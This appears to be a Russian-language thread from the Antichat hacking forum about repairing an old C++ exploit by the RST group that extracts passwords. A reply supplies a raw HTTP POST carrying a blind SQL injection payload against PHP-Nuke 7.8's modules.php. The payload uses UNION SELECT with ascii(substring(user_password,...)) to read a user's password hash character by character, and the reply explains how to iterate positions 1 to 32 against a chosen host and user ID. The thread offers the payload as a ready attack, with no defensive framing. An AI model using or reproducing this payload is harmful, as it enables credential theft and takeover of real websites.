Форум АНТИЧАТ - Старый сплойт от RST c++

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Старый сплойт от RST c++ (https://forum.antichat.xyz/showthread.php?t=36571)

Старый сплойт от RST c++

вообщем, это уже дело принципа, а с++ я только учу.

Есть давнишний сплойт от rst http://www.e-hack.org/exploit/archive/014.txt
если сорцы не править, выдаёт
[!] Please wait...
[+] Password: cccccccccccccccccccccccccccccccc

Заккоментировал
/*sprintf(result+pos-1,"%c",res);*/

и
/*result[33] = '\0';*/

выдает пароль вида
[!] Please wait...
[+] Password: x�dM$dSMHc

Намекните хотя бы, куда копать?!

http://someshit.net/showthread.php?t=20
тут правленое)

Если ты про первый, то он под Vc++ , а винды сейчас нет.
Следующий - не собирается, да и не тот он =)

А что мешает вручную отправлять пакеты серверу?
например так:

Цитата:

POST http://HOST/modules.php HTTP/1.0\n
Host: HOST
Content-Type: application/x-www-form-urlencoded\n
Content-Length: длина post запроса\n\n

name=PHP-Nuke+7.8+Exploit'UNION+SELECT+1,1+FROM+PREFIX_users+WHERE+user_id=USER_ID+AND+ascii(substring(user_password,1,1))/*

и просто напросто менять 1 на 2,3,4,5...32. ну соответственно PREFIX, USER_ID, HOST и длина post запроса